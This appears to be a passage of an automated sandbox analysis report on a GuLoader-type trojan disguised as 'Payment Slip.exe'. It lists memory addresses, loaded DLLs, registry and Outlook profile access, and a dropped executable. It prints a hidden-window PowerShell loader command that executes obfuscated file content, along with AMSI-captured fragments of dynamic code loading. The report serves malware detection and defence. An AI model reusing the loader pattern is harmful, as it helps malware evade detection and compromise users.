Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04DF9100	7_2_04DF9100
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04DF6120	7_2_04DF6120
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04DF2F20	7_2_04DF2F20
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0F668	7_2_04E0F668
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E01828	7_2_04E01828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E07FA8	7_2_04E07FA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0F988	7_2_04E0F988
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0D0E8	7_2_04E0D0E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E09EE8	7_2_04E09EE8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E004F7	7_2_04E004F7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0B4C8	7_2_04E0B4C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E082C8	7_2_04E082C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0E6C8	7_2_04E0E6C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0FCA8	7_2_04E0FCA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0CAA8	7_2_04E0CAA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E098A8	7_2_04E098A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0E088	7_2_04E0E088
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0AE88	7_2_04E0AE88
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E00E89	7_2_04E00E89
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E00E98	7_2_04E00E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E02E98	7_2_04E02E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0C468	7_2_04E0C468
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E09268	7_2_04E09268
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E00040	7_2_04E00040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0A848	7_2_04E0A848
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0DA48	7_2_04E0DA48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0F65B	7_2_04E0F65B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0F028	7_2_04E0F028
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E08C28	7_2_04E08C28
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0BE28	7_2_04E0BE28
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0D408	7_2_04E0D408
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0A208	7_2_04E0A208
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E01818	7_2_04E01818
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0001F	7_2_04E0001F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0B7E8	7_2_04E0B7E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E085E8	7_2_04E085E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0E9E8	7_2_04E0E9E8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E009C3	7_2_04E009C3
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E09BC8	7_2_04E09BC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0CDC8	7_2_04E0CDC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E009D0	7_2_04E009D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0E3A8	7_2_04E0E3A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0B1A8	7_2_04E0B1A8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0C788	7_2_04E0C788
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E09588	7_2_04E09588
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E01360	7_2_04E01360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0AB68	7_2_04E0AB68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0DD68	7_2_04E0DD68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0C148	7_2_04E0C148
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E08F48	7_2_04E08F48
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0F348	7_2_04E0F348
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0134F	7_2_04E0134F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0D728	7_2_04E0D728
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0A528	7_2_04E0A528
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0ED08	7_2_04E0ED08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E00508	7_2_04E00508
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E08908	7_2_04E08908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E0BB08	7_2_04E0BB08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E836F0	7_2_04E836F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E841BC	7_2_04E841BC
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80D88	7_2_04E80D88
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E81470	7_2_04E81470
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E81B50	7_2_04E81B50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82920	7_2_04E82920
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82238	7_2_04E82238
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E83008	7_2_04E83008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E836E1	7_2_04E836E1
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82FFB	7_2_04E82FFB
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E808DE	7_2_04E808DE
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E8146B	7_2_04E8146B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80960	7_2_04E80960
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80D79	7_2_04E80D79
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80040	7_2_04E80040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82229	7_2_04E82229
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E81B3F	7_2_04E81B3F
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80006	7_2_04E80006
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E80A10	7_2_04E80A10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04E82911	7_2_04E82911

Source: Payment Slip.exe

Static PE information: invalid certificate

Source: Payment Slip.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03

Source: C:\Users\user\Desktop\Payment Slip.exe

File created: C:\Users\user\AppData\Local\Temp\nsh287F.tmp

Jump to behavior

Source: Payment Slip.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Users\user\Desktop\Payment Slip.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Payment Slip.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\Payment Slip.exe

File read: C:\Users\user\Desktop\Payment Slip.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment Slip.exe "C:\Users\user\Desktop\Payment Slip.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"
Source: C:\Users\user\Desktop\Payment Slip.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Torosity $Politimssigasiliscan $Socialpdagoger), (Ionoxalis163 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:hebrisk = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afrormosia)), $Pleurocentesis).DefineDynamicModule($Greenwithe, $false).DefineType($Gwragedd, $Lynche, [System.MulticastDelegate])$Non

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Payment Slip.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
Source: C:\Users\user\Desktop\Payment Slip.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "			Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_071CC93B pushfd ; ret	2_2_071CC93C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_071CC926 pushfd ; ret	2_2_071CC927
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019CA98 pushfd ; retf 0019h	7_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019EE18 push eax; iretd	7_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019EE8C push eax; iretd	7_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_3_0019CF4C push eax; iretd	7_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00159C30 push esp; retf 0017h	7_2_00159D55

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
